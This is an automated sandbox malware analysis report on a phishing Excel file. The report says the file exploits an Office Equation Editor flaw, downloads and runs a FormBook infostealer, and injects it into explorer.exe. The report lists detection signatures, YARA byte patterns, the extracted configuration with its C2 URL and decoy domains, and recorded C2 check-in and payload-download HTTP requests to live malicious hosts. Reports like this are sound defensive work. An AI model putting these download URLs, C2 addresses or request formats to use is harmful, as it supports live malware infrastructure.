
Windows Analysis Report RFQ HCI20220113.xlsx

Overview

General Information

Sample Name: RFQ HCI20220113.xlsx
Analysis ID: 552850
MD5: da4befa8dfe9d56b937b01a2d2818175
SHA1: cf8e6ae0b8afb3d3f2956fbe0c88599fb361ede8
SHA256: 87f4b613c197b92f31d5eed4c7ad32a8ba4ae68313d56b54ff656f273fb56d86
Tags: VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2032 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2016 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2540 cmdline: "C:\Users\Public\vbc.exe" MD5: 83AC585E99B527EEB278702F8F711568)
      • vbc.exe (PID: 2712 cmdline: C:\Users\Public\vbc.exe MD5: 83AC585E99B527EEB278702F8F711568)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • cmd.exe (PID: 2568 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.topeasyip.company/i5nb/"], "decoy": ["integratedheartspsychology.com", "tappsis.land", "norfg.com", "1531700.win", "oneplusoneexperience.com", "circlessalaries.com", "tlcremodelingcompany.com", "susalud.info", "liyanghua.club", "pink-zemi.com", "orphe.biz", "themodelclarified.com", "candidate.tools", "morotrip.com", "d2dfms.com", "leisuresabah.com", "bjbwx114.com", "lz-fcaini1718-hw0917-bs.xyz", "at-commerce-co.net", "buymypolicy.net", "5151vip73.com", "rentglide.com", "louiecruzbeltran.info", "lanabasargina.com", "lakeforestparkapartments.com", "guangkaiyinwu.com", "bornthin.com", "restaurantkitchenbuilders.com", "ecommerceoptimise.com", "datahk99.com", "markfwalker.com", "granitowawarszawa.com", "theyouthwave.com", "iabg.xyz", "jholbrook.com", "bsc.promo", "xn--grlitzerseebhne-8sb7i.com", "cafeteriasula.com", "plushcrispies.com", "dedicatedvirtualassistance.com", "ventura-taxi.com", "thoethertb434-ocn.xyz", "ylhwcl.com", "bigsyncmusic.biz", "terapiaholisticaemformacao.com", "comidies.com", "171diproad.com", "07dgj.xyz", "vppaintllc.com", "thepatriottutor.com", "wxfive.com", "ceinpsico.com", "tuningelement.store", "asinment.com", "diafraz.xyz", "8crhnwh658ga.biz", "redwolf-tech.com", "ksherfan.com", "sensationalshroom.com", "buy-instagram-followers.net", "treeserviceconsulting.com", "vnln.space", "kate-films.com", "selfmeta.club"]}

Yara Overview

Memory Dumps

Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp
  Rule: JoeSecurity_FormBook
  Description: Yara detected FormBook
  Author: Joe Security

Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp
  Rule: Formbook_1
  Description: autogenerated rule brought to you by yara-signator
  Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp
  Rule: Formbook
  Description: detect Formbook in memory
  Author: JPCERT/CC Incident Response Group
  Strings:
  • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
  • 0x16b18:$sqlite3text: 68 38 2A 90 C5
  • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp
  Rule: JoeSecurity_AntiVM_3
  Description: Yara detected AntiVM_3
  Author: Joe Security

Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook
  Description: Yara detected FormBook
  Author: Joe Security

Unpacked PEs

Source: 5.0.vbc.exe.400000.9.unpack
  Rule: JoeSecurity_FormBook
  Description: Yara detected FormBook
  Author: Joe Security

Source: 5.0.vbc.exe.400000.9.unpack
  Rule: Formbook_1
  Description: autogenerated rule brought to you by yara-signator
  Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 5.0.vbc.exe.400000.9.unpack
  Rule: Formbook
  Description: detect Formbook in memory
  Author: JPCERT/CC Incident Response Group
  Strings:
  • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
  • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
  • 0x15d18:$sqlite3text: 68 38 2A 90 C5
  • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
  • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C

Source: 5.2.vbc.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook
  Description: Yara detected FormBook
  Author: Joe Security

Source: 5.2.vbc.exe.400000.0.unpack
  Rule: Formbook_1
  Description: autogenerated rule brought to you by yara-signator
  Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 198.23.213.59, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2016, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2016, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2016, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2540
Sigma detected: Execution from Suspicious Folder
Source: Process started; Author: Florian Roth; Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2016, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2540

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp; Malware Configuration Extractor: FormBook (the extracted C2 list and decoy domains are given in full under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: RFQ HCI20220113.xlsx; Virustotal: Detection: 33%
Source: RFQ HCI20220113.xlsx; ReversingLabs: Detection: 30%
Yara detected FormBook
Source: Yara match; File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://198.23.213.59/1155/vbc.exe; Avira URL Cloud: Label: malware
Source: www.topeasyip.company/i5nb/; Avira URL Cloud: Label: malware
Source: http://www.ylhwcl.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA==; Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\Public\vbc.exe; Avira: detection malicious, Label: HEUR/AGEN.1211287
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe; Avira: detection malicious, Label: HEUR/AGEN.1211287
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe; ReversingLabs: Detection: 43%
Source: C:\Users\Public\vbc.exe; ReversingLabs: Detection: 43%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe; Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.vbc.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.5.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.9.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.7.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: cmd.pdb,$ source: vbc.exe, 00000005.00000003.519388650.000000000054A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.519365652.000000000050C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.520545491.0000000000470000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000002.520863272.0000000000A50000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.483549508.0000000000740000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.482084370.00000000005E0000.00000004.00000001.sdmp, cmd.exe
Source: Binary string: cmd.pdb source: vbc.exe, 00000005.00000003.519388650.000000000054A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.519365652.000000000050C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.520545491.0000000000470000.00000040.00020000.sdmp
Potential document exploit detected (performs DNS queries)
Source: global traffic; DNS query: name: www.orphe.biz
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe; Code function: 4x nop then pop esi; 5_2_0041584D
Source: C:\Users\Public\vbc.exe; Code function: 4x nop then pop edi; 5_2_004162F6
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 4x nop then pop edi; 7_2_000D62F6
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 4x nop then pop esi; 7_2_000D584D
Potential document exploit detected (unknown TCP traffic)
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 198.23.213.59:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 103.224.212.220:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 103.224.212.220:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 103.224.212.220:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 122.10.28.11:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 122.10.28.11:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 122.10.28.11:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 192.185.98.251:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 192.185.98.251:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 192.185.98.251:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Domain query: www.terapiaholisticaemformacao.com
Source: C:\Windows\explorer.exe; Network Connect: 103.224.212.220 80
Source: C:\Windows\explorer.exe; Network Connect: 195.211.74.112 80
Source: C:\Windows\explorer.exe; Domain query: www.ylhwcl.com
Source: C:\Windows\explorer.exe; Domain query: www.integratedheartspsychology.com
Source: C:\Windows\explorer.exe; Domain query: www.circlessalaries.com
Source: C:\Windows\explorer.exe; Network Connect: 221.121.143.148 80
Source: C:\Windows\explorer.exe; Domain query: www.topeasyip.company
Source: C:\Windows\explorer.exe; Network Connect: 216.172.160.188 80
Source: C:\Windows\explorer.exe; Network Connect: 23.80.120.93 80
Source: C:\Windows\explorer.exe; Domain query: www.ecommerceoptimise.com
Source: C:\Windows\explorer.exe; Network Connect: 122.10.28.11 80
Source: C:\Windows\explorer.exe; Domain query: www.bjbwx114.com
Source: C:\Windows\explorer.exe; Network Connect: 192.185.98.251 80
Source: C:\Windows\explorer.exe; Domain query: www.orphe.biz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.topeasyip.company/i5nb/
Source: Joe Sandbox View; ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU
Source: Joe Sandbox View; ASN Name: AS45671-NET-AUWholesaleServicesProviderAU
Source: global traffic; HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew== HTTP/1.1; Host: www.orphe.biz; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr HTTP/1.1; Host: www.circlessalaries.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA== HTTP/1.1; Host: www.ylhwcl.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /i5nb/?7nqdxT7p=mP9GS3thMR3+ARMxpcHmObplP0vLxCSJ1Uc4SKl6p1x9FFB9D/wfcJtU5Ejvu094ffKQCA==&hPGx3Z=4ha06H5pmr HTTP/1.1; Host: www.terapiaholisticaemformacao.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw== HTTP/1.1; Host: www.ecommerceoptimise.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr HTTP/1.1; Host: www.integratedheartspsychology.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw== HTTP/1.1; Host: www.bjbwx114.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View; IP Address: 103.224.212.220
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Date: Fri, 14 Jan 2022 02:21:54 GMT; Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.26; Last-Modified: Thu, 13 Jan 2022 22:04:27 GMT; ETag: "66000-5d57ddeb75e04"; Accept-Ranges: bytes; Content-Length: 417792; Keep-Alive: timeout=5, max=100; Connection: Keep-Alive; Content-Type: application/x-msdownload; Data Raw (body begins with an MZ/PE header; hex preview truncated here): 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ...
Source: global traffic; HTTP traffic detected: GET /1155/vbc.exe HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: 198.23.213.59; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Thu, 13 Jan 2022 19:23:06 GMT; Server: Apache; Upgrade: h2,h2c; Connection: Upgrade, close; Last-Modified: Fri, 26 Jul 2019 13:18:26 GMT; Accept-Ranges: bytes; Content-Length: 2361; Vary: Accept-Encoding; Content-Type: text/html; Data Raw (HTML 404 page; hex preview truncated here): 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e ...
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Thu, 13 Jan 2022 19:23:11 GMT; Server: Apache; Upgrade: h2,h2c; Connection: Upgrade, close; Last-Modified: Fri, 14 Feb 2020 00:55:46 GMT; Accept-Ranges: bytes; Content-Length: 11816; Vary: Accept-Encoding; Content-Type: text/html; Data Raw (HTML 404 page; hex preview truncated here): 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 ...
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html
                Server: Microsoft-IIS/10.0
                X-Powered-By: ASP.NET
                Date: Thu, 13 Jan 2022 19:23:17 GMT
                Connection: close
                Content-Length: 1245
                Data Ascii (decoded from the report's hex dump, which the report truncates part-way through the body; the default IIS 404 page):
                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
                <html xmlns="http://www.w3.org/1999/xhtml">
                <head>
                <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
                <title>404 - File or directory not found.</title>
                <style type="text/css">
                <!--
                body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
                fieldset{padding:0 15px 10px 15px;}
                h1{font-size:2.4em;margin:0;color:#FFF;}
                h2{font-size:1.7em;margin:0;color:#CC0000;}
                h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
                #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
                background-color:#555555;}
                #content{margin:0 0 0 2%;position:relative;}
                .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
                -->
                </style>
                </head>
                <body>
                <div id="header"><
            Source: unknown | TCP traffic detected without corresponding DNS query: 198.23.213.59 (50 occurrences of this entry; the peer is addressed as a literal IP, so no DNS lookup precedes any of these connections)
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com/
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://java.sun.com
            Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
            Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: explorer.exe, 00000006.00000000.506237385.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: explorer.exe, 00000006.00000000.501432004.0000000003E50000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
            Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: explorer.exe, 00000006.00000000.506237385.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
